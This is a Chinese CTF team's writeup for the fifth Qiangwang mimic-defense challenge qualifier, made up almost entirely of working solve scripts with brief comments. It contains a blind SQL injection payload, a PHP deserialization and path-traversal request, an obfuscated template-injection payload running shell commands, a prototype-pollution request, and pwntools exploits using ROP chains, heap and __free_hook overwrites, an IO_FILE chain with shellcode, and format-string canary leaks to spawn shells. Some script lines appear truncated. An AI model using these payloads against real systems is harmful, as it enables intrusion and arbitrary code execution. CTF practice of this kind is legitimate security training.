EDI
JOIN US ▶▶▶
EDI安全的CTF战队经常参与各大CTF比赛,了解CTF赛事。
欢迎各位师傅加入EDI,大家一起打CTF,一起进步。
(诚招re crypto pwn misc方向的师傅)有意向的师傅请联系邮箱root@edisec.net、[email protected](带上自己的简历,简历内容包括但不限于就读学校、个人ID、擅长技术方向、历史参与比赛成绩等等。
点击蓝字 · 关注我们
1
popsql
benchmark盲注
sys.schema_table_statisticssys.x$statement_analysis Fl49ish3re.f1aG123
'password' : f"a'or/**/if((select/**/strcmp(ord(right((select(group_concat(f1aG123))from(Fl49ish3re)),{i})),{s})),1,benchmark(7000000,sha(1)))/**/or'a"
2
ezus
class UserAccount{protected $username;protected $password;public function __construct($username, $password){$this->username = $username;$this->password = $password;// $this->password = new order("suanve://localhost@prankhub/../../../../../../../Users/su/Downloads/fastify/flag","file://try/pass//php:");}}function object_sleep($str){$ob = str_replace(chr(0) . '*' . chr(0), '@0@0@0@', $str);return $ob;}function object_weakup($ob){$r = str_replace('@0@0@0@', chr(0) . '*' . chr(0), $ob);return $r;}class order{public $f;public $hint;public function __construct($hint, $f){$this->f = $f;$this->hint = $hint;}public function __wakeup(){//something in hint.php// if ($this->hint != "pass" || $this->f != "pass") {// $this->hint = "pass";// $this->f = "pass";// }}public function __destruct(){if (filter_var($this->hint, FILTER_VALIDATE_URL)) {$r = parse_url($this->hint);if (!empty($this->f)) {if (strpos($this->f, "try") !== false && strpos($this->f, "pass") !== false) {@include($this->f . '.php');} else {die("try again!");}if (preg_match('/prankhub$/', $r['host'])) {@$out = file_get_contents($this->hint);echo "<br/>" . $out;} else {die("<br/>error");}} else {die("try it!");}} else {echo "Invalid URL";}}}// @$username = $_POST['username'];// @$password = $_POST['password'];$username = "@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@";$password = '";s:11:"%00*%00password";O:5:"order":2:{s:1:"f";s:21:"file://try/pass//php:";s:4:"hint";s:80:"suanve://localhost@prankhub/../../../../../../../Users/su/Downloads/fastify/flag";}';$password = urldecode($password);// unserialize($password);$a = new UserAccount($username, $password);$user = serialize($a);echo $user;echo "pop:".object_weakup(object_sleep($user));unserialize(object_weakup(object_sleep($user)));
POST /tm.php HTTP/1.1Host: 172.51.243.32User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/x-www-form-urlencodedContent-Length: 232username=@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@@0@0@0@&password=";s:11:"%00*%00password";O:5:"order":3:{s:1:"f";s:21:"file://try/pass//php:";s:4:"hint";s:67:"suanve://localhost@prankhub/../../../../../../../f1111444449999.txt";}
3
没有⼈⽐我更懂py
[''class']['mro'][1]'subclasses'[213]['init']['globals']['builtins']['eval']('import("o"+"s").popen("cat /*").read()'']data={{()['137137143154141163163137137']['137137155162157137137'][1]['137137163165142143154141163163145163137137']()[213]['137137151156151164137137']['137137147154157142141154163137137']['137137142165151154164151156163137137']['145166141154']('137137151155160157162164137137504215742534216342515616015716014515650421431411644057524251561621451411445051')}}
4
WHOYOUARE
POST /user HTTP/1.1Host: 172.51.243.13:3000User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:107.0) Gecko/20100101 Firefox/107.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1Content-Type: application/jsonContent-Length: 121{"user":["{"constructor":{"prototype":{"2":"cat /flag"}},"username":"admin","command":["-c","-i"]}"]}
1
Welcome
2
babymisc
猜数字
from pwn import *# context.log_level = 'debug'while True:io = remote("172.51.243.74",9999)io.recvline()io.recvline()io.recvline()io.sendline("Y")#low = 0up = 999999# guess = 454346for i in range(15):guess = round((int(up)+int(low))/2)s = ""try:s = io.recvuntil(b"Please enter a number:")except:io.interactive()print(b"[+]"+s)if b"Please e" not in s:print(s)break# s = io.recvuntil(b"Please enter a number:")print(f"[*] GET {s}")if "low" in str(s):low = guessguess = int ((up - low) / 2) + low# print(low)elif "up" in str(s):up = guessguess = int ((up - low) / 2) + low# print(up)else:guess = int ((up - low) / 2) + lowguess = int(guess)print(f"[*] SEND {guess}")io.sendline(f"{guess}")if "lost" in str(s):breakelif "flag" in str(s):print("flag!!!!!")break
1
weakrandom
sha256硬爆,过第⼀个验证。然后多跑脚本,发现在⼀些次数下存在定值670760960,⽤该定值去碰撞即可。
from pwn import *import hashlibimport oscontext.log_level = 'debug'p = remote('172.51.243.182', 9998)class WeakRandom:def __init__(self,seed,n,s):self.x = seedself.n = nself.s = sdef next(self):x = int((self.x ** 2) // (10 ** (self.s // 2))) % self.nself.x = xhigh = (int(hashlib.sha256(str(x).encode()).hexdigest(),16) >> 16) & (2 ** 16 - 1)low = x & (2 ** 16 - 1)result = high << 16 | lowreturn resultString = "ABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890abcdefghijklmnopqrstuvwxyz"p.recvuntil(b'sha256(XXXX+')a = p.recvuntil(b') == ')[:-5]b = p.recvline().strip().decode()for i in String:for j in String:for k in String:for l in String:s = (i+j+k+l).encode() + asha = hashlib.sha256(s).hexdigest()if sha == b:p.recvuntil(b'Give me XXXX:n')p.sendline(s[:4])n = 10000000000s = 4seed = os.urandom(4)seed = int.from_bytes(seed,byteorder = "big")r = WeakRandom(seed,n,s)while True:p.recvuntil(b'Please your guess : ')#p.sendline(str(r.next()).encode('ascii'))p.sendline(b'670760960')#p.interactive()
1
windows_call
AES查表法 + 函数Hook 解题思路 开头两个md5是为了检验输⼊的数据为⼤写字⺟。
之后程序把flag{}中的内容分为了两部分
第一部分只有前8字节
第二部分为剩下的字节
程序把第二部分转换成了16进制数据,并对第一部分进行了一些加密操作
,最终在进入AES加密之前两部分进行了异或
from z3 import *x = BitVec("x",16)y = BitVec("y",16)sol = Solver()def xpan(n):if n < 0:return n+0x100else:return nmd5_init = x ^ yv25 = (x ^ y) & 0xffMD5Final = md5_init >> 8v38 = [0] * 16for v23 in range(16):v38[v23] = ((MD5Final + v23) & 0xff) ^ ((v25 + v23) & 0xff)MD5Update = 0for v27 in range(16):v29 = v38[v27] ^ xpan(v27 - 64);MD5Update = (MD5Update + v29) & 0xffffsol.add((x & 0xff00) >= 0xc800)sol.add((x & 0xff00) <= 0xd000)sol.add((y & 0xff00) >= 0xc500)sol.add((y & 0xff00) <= 0xd000)sol.add((y - x) & 0xffff == 0x2B8)sol.add(y & 0xff == 0xA0)sol.add((x & 0xFF00) < 0xCA00)sol.add(MD5Update == 0x8A8) # 0xc9e8 0xcca0assert sol.check() == satprint(hex(sol.model()[x].as_long()),end = " ")print(hex(sol.model()[y].as_long()))
得到数据: 0xc9e8 0xcca0
下⾯进⾏AES解密与异或
qqq = [0x4D, 0x4F, 0x4D, 0x43, 0x45, 0x47, 0x45, 0x43, 0x5D, 0x5F, 0x5D, 0x43, 0x45, 0x47, 0x45, 0x43]# ppp = [0xC6, 0xD7, 0x19, 0x8E, 0x95, 0xEB, 0x77, 0x58, 0x24, 0x50, 0x9A, 0x0D, 0xBF, 0x15, 0x4A, 0xFF]from Crypto.Cipher import AESfrom struct import *cip_list = [0x84,0x37,0xa0,0xf3,0xec,0x36,0x34,0xfc,0x94,0xa2,0x38,0x6f,0x3f,0x34,0x7e,0x7c]cip = b""for i in cip_list:cip += pack("B", i)key = b""key_list = [0x8D, 0x8E, 0x8F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x95, 0x96, 0x97, 0x88, 0x89, 0x8A, 0x8B, 0x8C]for i in key_list:key += pack("B", i)print("cip => ", cip)print("key => ",key)Set_AES = AES.new(key,AES.MODE_ECB)# m = Set_AES.encrypt(cip)m = Set_AES.decrypt(cip)# print(m)ans = 0for i in m:print(((hex(i ^ qqq[ans])[2:]).rjust(2,"0")).upper(),end="")ans += 1print()
qqq = [0x4D, 0x4F, 0x4D, 0x43, 0x45, 0x47, 0x45, 0x43, 0x5D, 0x5F, 0x5D, 0x43, 0x45, 0x47, 0x45, 0x43]# ppp = [0xC6, 0xD7, 0x19, 0x8E, 0x95, 0xEB, 0x77, 0x58, 0x24, 0x50, 0x9A, 0x0D, 0xBF, 0x15, 0x4A, 0xFF]from Crypto.Cipher import AESfrom struct import *cip_list = [0x84,0x37,0xa0,0xf3,0xec,0x36,0x34,0xfc,0x94,0xa2,0x38,0x6f,0x3f,0x34,0x7e,0x7c]cip = b""for i in cip_list:cip += pack("B", i)key = b""key_list = [0x8D, 0x8E, 0x8F, 0x80, 0x81, 0x82, 0x83, 0x84, 0x95, 0x96, 0x97, 0x88, 0x89, 0x8A, 0x8B, 0x8C]for i in key_list:key += pack("B", i)print("cip => ", cip)print("key => ",key)Set_AES = AES.new(key,AES.MODE_ECB)# m = Set_AES.encrypt(cip)m = Set_AES.decrypt(cip)# print(m)ans = 0print("flag{E8C9A0CC",end = "")for i in m:print(((hex(i ^ qqq[ans])[2:]).rjust(2,"0")).upper(),end="")ans += 1print("}")
2
comeongo
这两个函数对最后的字符进⾏了约束,经过调试可以找到最后的Name和passwd分别为:
name = "GoM0bi13_BingGo@"passwd = "G3tItEzForRevG0!"
name = "GoM0bi13_BingGo@"passwd = "G3tItEzForRevG0!"import hashlibstr = "flag{" + name + passwd + "}"hl = hashlib.md5()hl.update(str.encode(encoding='utf-8'))ttt = hl.hexdigest()print(str)print(ttt)
flag即为:
6470d669e15349795c646c9549ab2f98
1
bfbf
存在数组越界,可以读取栈内地址,以及修改返回地址进⾏ROP。
#!usr/bin/env python#coding=utf-8from pwn import *context(arch = 'amd64',os = 'linux',log_level = 'debug')elf = ELF('pwn')libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')DEBUG = 0if DEBUG:#libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")#ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/ld-2.27.so")#p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path})p = process('./pwn')else:ip = '172.51.243.161'port = 9999libc = ELF("./libc.so.6")p = remote(ip, port)def debug(info="b main"):#gdb.attach(p, info)#gdb.attach(p, "b *$rebase(0x17e3)")gdb.attach(p, "b *$rebase(0x18cd)")p.recvuntil(b'BF_PARSER>>n')payload = b'>'*0x238 + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.'payload += b'<'*0x25 + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.' + b'>' + b'.'payload += b'<'*5 + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>'for i in range(28):payload += b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>' + b',' + b'>'#debug()p.send(payload)sleep(0.5)leak = u64(p.recv(6).ljust(8, b'x00')) - 0x24083log.info("libc_base==>0x%x" %leak)pie = u64(p.recv(6).ljust(8, b'x00')) - 0x1955log.info("pie==>0x%x" %pie)pop_rdi = 0x0000000000023b6a + leakpop_rsi = 0x000000000002601f + leakpop_rdx = 0x0000000000142c92 + leakret = 0x0000000000022679 + leakread = leak + libc.sym['read']bss = 0x0000000000008060 + pieopen = libc.sym['open'] + leakclose = leak + libc.sym['close']write = leak + libc.sym['write']payload2 = p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(8) + p64(read)payload2 += p64(pop_rdi) + p64(0) + p64(close)payload2 += p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) + p64(open)payload2 += p64(pop_rdi) + p64(0) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(50) + p64(read)payload2 += p64(pop_rdi) + p64(1) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(50) + p64(write)p.send(payload2)sleep(0.5)p.send(b'./flagx00x00')p.interactive()
2
webheap_revenge
#coding:utf-8from pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./webheap_revenge'elf=ELF(elfelf)context.arch=elf.archgdb_text='''b * $rebase(0x3DE8)b * $rebase(0x3CE0)'''if len(sys.argv)==1 :io=process(elfelf)gdb_open=1libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]elif sys.argv[1]=='2' :io=process(elfelf)gdb_open=0libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :io=remote('172.51.243.88',9999)gdb_open=0libc=ELF('./libc-2.27.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def gdb_attach(io,a):if gdb_open==1 :gdb.attach(io,a)def build_data(a1, a2, a3,data2):data = "xb9x80x05"data += "x86" + p32(a1)data += "x82" + p32(a2)data += "x82" + p32(a3)data += "xbdx83" + p64(len(data2))+data2data += 'x80x05'io.sendlineafter("Packet length: ",str(len(data)))io.sendafter('Content: ',data)def add(a,b):build_data(0,a,b,'aaaa')def show(a):build_data(1,a,0,'aaaa')def delete(a):build_data(2,a,0,'aaaa')def edit(a,b):build_data(3,a,0,b)add(0,0x4f0)add(1,0x100)add(2,0x100)add(3,0x100)delete(0)add(0,0x4f0)show(0)libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-96-0x10libc.address=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']delete(3)delete(2)edit(1,'a'*0x108+p64(0x111)+p64(free_hook_addr))add(2,0x100)add(3,0x100)edit(2,'/bin/shx00')edit(3,p64(system_addr))delete(2)success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))gdb_attach(io,gdb_text)io.interactive()
3
webheap
#coding:utf-8from pwn import *from ctypes import CDLLcontext.log_level='debug'elfelf='./webheap'elf=ELF(elfelf)context.arch=elf.archgdb_text='''b * $rebase(0x3DE8)b * $rebase(0x3CE0)'''if len(sys.argv)==1 :io=process(elfelf)gdb_open=1libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]elif sys.argv[1]=='2' :io=process(elfelf)gdb_open=0libc=ELF('/lib/x86_64-linux-gnu/libc.so.6')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :io=remote('172.51.243.210',9999)gdb_open=0libc=ELF('./libc-2.27.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def gdb_attach(io,a):if gdb_open==1 :gdb.attach(io,a)def build_data(a1, a2, a3,data2=b""):data = "xb9x80x05"data += "x86" + p32(a1)data += "x82" + p32(a2)data += "x82" + p32(a3)data += "xbdx83" + p64(len(data2))+data2data += 'x80x05'io.sendlineafter("Packet length: ",str(len(data)))io.sendafter('Content: ',data)def add(a,b):build_data(0,a,b,'aaaa')def show(a):build_data(1,a,0,'aaaa')def delete(a):build_data(2,a,0,'aaaa')def edit(a,b):build_data(3,a,0,b)add(0,0x500)add(1,0x100)delete(0)show(0)libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-96-0x10libc.address=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']delete(1)edit(1,'x00'*0x10)delete(1)edit(1,p64(free_hook_addr))add(2,0x100)add(3,0x100)edit(2,'/bin/shx00')edit(3,p64(system_addr))delete(2)success('libc_base:'+hex(libc_base))# success('heap_base:'+hex(heap_base))gdb_attach(io,gdb_text)io.interactive()
4
store
#coding:utf-8import sysfrom pwn import *from ctypes import CDLL='debug'elfelf='./store'#context.arch='amd64'while True :# try :elf=ELF(elfelf)=elf.archgdb_text='''telescope $rebase(0x202040) 16b mprotect'''if len(sys.argv)==1 :clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')io=process(elfelf)gdb_open=1# io=process(['./'],env={'LD_PRELOAD':'./'})clibc.srand(clibc.time(0))libc=ELF('./libc-2.31.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]else :clibc=CDLL('/lib/x86_64-linux-gnu/libc.so.6')io=remote('172.51.243.98',9999)gdb_open=0clibc.srand(clibc.time(0))libc=ELF('./libc-2.31.so')# ld = ELF('/lib/x86_64-linux-gnu/ld-2.31.so')one_gadgaet=[0x45226,0x4527a,0xf03a4,0xf1247]def gdb_attach(io,a):if gdb_open==1 :gdb.attach(io,a)def choice(a):: ',str(a))def add(a,b,c):choice(1): ',str(a)): n',b): n',c)def add_no(a):choice(1): ',str(a))def edit(a,b,c):choice(3): ',str(a)): n',b): n',c)def show(a):choice(4): ',str(a))def delete(a):choice(2): ',str(a))add(0x720,'aaaa','aaaa')add(0x710,'aaaa','aaaa')delete(0)delete(1)show(0)libc_base=u64(io.recvuntil('x7f')[-6:]+'x00x00')-libc.sym['__malloc_hook']-96-0x10=libc_basebin_sh_addr=libc.search('/bin/shx00').next()system_addr=libc.sym['system']free_hook_addr=libc.sym['__free_hook']mprotect_addr = libc.sym['mprotect']_IO_list_all = libc.sym['_IO_list_all']show(1): n')heap_base=u64(io.recv(6)+'x00x00')magic = libc_base + 0x0000000000157d8a'''mov rbp,QWORD PTR [rdi+0x48]mov rax,QWORD PTR [rbp+0x18]lea r13,[rbp+0x10]mov DWORD PTR [rbp+0x10],0x0mov rdi,r13call QWORD PTR [rax+0x28]'''_IO_str_jumps = libc.sym['_IO_file_jumps']+0xc0_IO_cookie_jumps = libc.sym['_IO_file_jumps']-0xa80fs_base = libc_base +0x1f35c0leave_ret = libc_base + 0x000000000005aa48add30_rsp_pop_rbx = libc_base + 0x000000000011177dpop_rdi = libc_base + 0x0000000000026b72pop_rsi = libc_base + 0x0000000000027529pop_rdx_rbx = libc_base + 0x0000000000162866main_arena = libc_base + 0x1f2cc0 - 0x60heap_base=heap_base-0x290IO_address=heap_base+0x290IO_FILE = 'x00'*8IO_FILE += p64(heap_base + 0x10) # buf_baseIO_FILE += p64(heap_base + 0x10 + 0x700) # buf_endIO_FILE += p64(0)IO_FILE += 'x00'*0x10IO_FILE += 'x00'*0x08 + p64(IO_address + 0xE0) #chainIO_FILE += 'x00'*0x10IO_FILE += 'x00'*0x10IO_FILE += 'x00'*0x40IO_FILE += 'x00'*8 + p64(_IO_str_jumps)IO_FILE += 'x00'*0x20 + p64(0) + p64(0xFFFFFFFF) + 'x00'*8IO_FILE += p64(IO_address + 0xE0*4 + 0x20 + 0x10) # buf_baseIO_FILE += p64(IO_address + 0xE0*4 + 0x20 + 0x10 + 270) # buf_endIO_FILE += p64(0)IO_FILE += 'x00'*0x10IO_FILE += 'x00'*0x08 + p64(IO_address + 0xE0*2) #chainIO_FILE += 'x00'*0x10IO_FILE += 'x00'*0x10IO_FILE += 'x00'*0x40IO_FILE += 'x00'*8 + p64(_IO_str_jumps)IO_FILE += 'x00'*0x20 + p64(0) + p64(0xFFFFFFFF) + 'x00'*8IO_FILE += p64(IO_address + 0xE0*4 + 0x20 + 0x90 + 0x40 + 0x10) # buf_baseIO_FILE += p64(IO_address + 0xE0*4 + 0x20 + 0x90 + 0x40 + 0x10 + 14) # buf_endIO_FILE += p64(0)IO_FILE += 'x00'*0x10IO_FILE += 'x00'*0x08 + p64(IO_address + 0xE0*3) #chainIO_FILE += 'x00'*0x10IO_FILE += 'x00'*0x10IO_FILE += 'x00'*0x40IO_FILE += 'x00'*8 + p64(_IO_str_jumps)IO_FILE += 'x00'*0x20 + p64(0) + p64(0xFFFFFFFF) + 'x00'*8IO_FILE += p64(0) # buf_baseIO_FILE += p64(0) # buf_endIO_FILE += p64(0)IO_FILE += 'x00'*0x10IO_FILE += 'x00'*0x08 + p64(0) #chainIO_FILE += 'x00'*0x10IO_FILE += 'x00'*0x10IO_FILE += 'x00'*0x40IO_FILE += 'x00'*8 + p64(_IO_cookie_jumps + 0x60)pay1=IO_FILErol = lambda val, r_bits, max_bits:(val << r_bits%max_bits) & (2**max_bits-1) |((val & (2**max_bits-1)) >> (max_bits-(r_bits%max_bits)))R = rol((magic), 0x11, 64)orw_address = IO_address + 0xE0*4 + 0x20 + 0x90 + 0x40 + 0x10 + 0x20 + 0x10IO_FILE += p64(orw_address) + p64(0) + p64(R) + p64(0)IO_FILE += p64(0) + p64(0x21)IO_FILE += 'x03x00'*0x10 + 'x00x00'*0x30IO_FILE += 'x00'*0x8*0x7IO_FILE += p64(fs_base+0x30)IO_FILE += (p64(0) + p64(0x21))*4IO_FILE += 'x00'*0x28 + p64(leave_ret) +'x00'*0x18 + p64(orw_address + 0x50) + 'x00'*0x8 + p64(add30_rsp_pop_rbx) + p64(0) + p64(orw_address) + p64(0)IO_FILE += 'x00'*0x20 + p64(libc_base+0x0000000000032b5a)+p64(IO_address+0x740)pay = p64(pop_rdi) + p64(heap_base) + p64(pop_rsi) + p64(0xF000) + p64(pop_rdx_rbx) + p64(7) + p64(0)pay += p64(mprotect_addr) + p64(orw_address + 0xE0+0x1b0+0x48)pay += asm('''mov rax, 0xc0mov rbx, 0x500000mov rcx, 0x5000mov rdx, 3mov rsi, 1048610xor rdi, rdixor rbp, rbpint 0x80mov rsp, 0x500a00mov rax, 5push 0x2emov rbx, rspxor rcx, rcxint 0x80mov rbx, raxmov rax, 0x8dmov rcx, rspmov rdx, 0x1337int 0x80add rcx, 126mov rdi, raxmov rsi, rspmov rdx, 0x100xor rax, raxsyscallmov rdi, 1mov rax, 1syscallmov rdi, 0mov rsi, 0x500c00mov rdx, 0x100xor rax, raxsyscallmov rax, 5mov rbx, 0x500c00xor rcx, rcxxor rdx, rdxint 0x80mov rdi, raxmov rsi, rspmov rdx, 0x100xor rax, raxsyscallmov rdi, 1mov rax, 1syscall''')payload = p64(0)*3payload += p64(_IO_list_all - 0x20)payload += IO_FILEadd_no(0x720)add_no(0x710)delete(0)add_no(0xff0)edit(0,payload,pay.ljust(0x100))delete(1)add_no(0xff0)add_no(0x710)choice(5)io.recvuntil('f1ag')flag_name=flag+io.recvuntil('x00')io.send(flag_name):'+hex(libc_base)):'+hex(heap_base))gdb_attach(io,gdb_text)io.interactive()# except Exception as e:# io.close()# continue# else:# continue f1agdeb355a8b42ef5a9ea4ez8
1
pwn1
借⽤格式化字符泄露出canary,然后rop
#!usr/bin/env python#coding=utf-8from pwn import *p = remote("172.51.243.90", 9999)#p = process('./pwn1')context.log_level = 'debug'elf = ELF('./pwn1')#gdb.attach(p, "b main")p.recvuntil(b'somethingn')p.sendline(b'1')p.recvuntil(b'0x')pie = int(p.recv(12), 16) - 0xa94log.info("pie==>" + hex(pie))binsh = 0x0000000000202068 + piesystem = 0xa2c + piepop_rdi = 0xc73 + piep.sendline(b'2')p.send(b"%33$p")p.recvuntil(b'0x')canary = int(p.recv(16), 16)log.info("canary==>" + hex(canary))payload = b'a'*0xc8 + p64(canary) + p64(0xdeadbeef) + p64(pop_rdi) + p64(binsh) + p64(system)p.send(payload)p.interactive()
2
pwn1-1
跟pwn1没什么差别,漏洞点是⼀致的,但是这边getshell需要调整rdx为0
#!usr/bin/env python#coding=utf-8from pwn import *p = remote("172.51.243.208", 9999)#p = process('./pwn1-1')context.log_level = 'debug'#gdb.attach(p, "b *$rebase(0x00000000000014F4)")p.recvuntil(b'Welcome to mimic world,try somethingn')p.sendline(b'1')p.recvuntil(b'0x')pie = int(p.recv(12), 16) - 0x12a0log.info("pie==>" + hex(pie))binsh = 0x0000000000004050 + piesystem = 0x00000000000011A2 + piepop_rdi = 0x0000000000001943 + piepp_ret = 0x0000000000001941 + piebss = 0x0000000000004060 + pieret = 0x000000000000101a + piex_bss = 0x000000000000406C + piep.sendline(b'2')p.recvuntil(b"hellon")payload = b'a' + b'%9$hnna' + p64(x_bss)p.send(payload)sleep(2)payload2 = b'x00'*0xe8 + p64(bss) + p64(0) + p64(ret) + p64(pop_rdi) + p64(binsh) + p64(pp_ret) + p64(0)*2 + p64(system)p.send(payload2)# p.send(payload2)p.interactive()
3
pwn2-1
原题,把hacknote改成64位了,但是思路一致
#!usr/bin/env python#coding=utf-8from pwn import *context(arch = 'amd64',os = 'linux',log_level = 'debug')elf = ELF('pwn2-1')libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')DEBUG = 0if DEBUG:#libc = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/libc-2.27.so")#ld = ELF("/home/shoucheng/tools/glibc-all-in-one/libs/2.27-3ubuntu1.6_amd64/ld-2.27.so")#p = process(argv=[ld.path,elf.path], env={"LD_PRELOAD" : libc.path})p = process('./pwn2-1')else:ip = '172.51.243.104'port = 9999#libc = ELF("./libc.so.6")p = remote(ip, port)def debug(info="b main"):#gdb.attach(p, info)gdb.attach(p, "b *$rebase(0x0000000000001B0A)")def add(size,content):p.sendlineafter('choice :', b'1')p.sendlineafter('Note size :',str(size).encode("ascii"))p.sendafter('Content :',content)def free(idx):p.sendlineafter('choice :', b'2')p.sendlineafter('Index :',str(idx).encode("ascii"))def show(idx):p.sendlineafter('choice :', b'3')p.sendlineafter('Index :',str(idx).encode("ascii"))#debug()p.sendlineafter(b"Your choice :", b'5')p.recvuntil(b'0x')pie = int(p.recv(12), 16) - 0x11f0puts = pie + 0x11d0log.info("pie==>0x%x" %pie)sys = 0x0000000000001BF2 + pieadd(0x20, b'a')add(0x20, b'a')free(0)free(1)add(0x10, p64(puts) + p64(elf.got['puts'] + pie))show(0)leak = u64(p.recv(6).ljust(8, b'x00')) - libc.sym['puts']log.info("libc==>0x%x" %leak)ogg = leak + 0xe3b01free(2)add(0x10, p64(ogg))show(0)p.interactive()
4
webmimic
http://172.51.243.8:804/mimic_storagerequest url is /mimic_storagerandom is: 668308459
http://172.51.243.8:804/getflag?sec=668308459&path=bAzlsD1ChiFW5eMC5tUokHErPkdjqARErequest url is /getflagflag{7t5oKH9rb8t7L1LaZwRtEvJRMaoY2aGm}
EDI安全
扫二维码|关注我们
一个专注渗透实战经验分享的公众号
原文始发于微信公众号(EDI安全):第五届“强网”拟态防御国际精英挑战赛初赛WriteUp By EDISEC
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论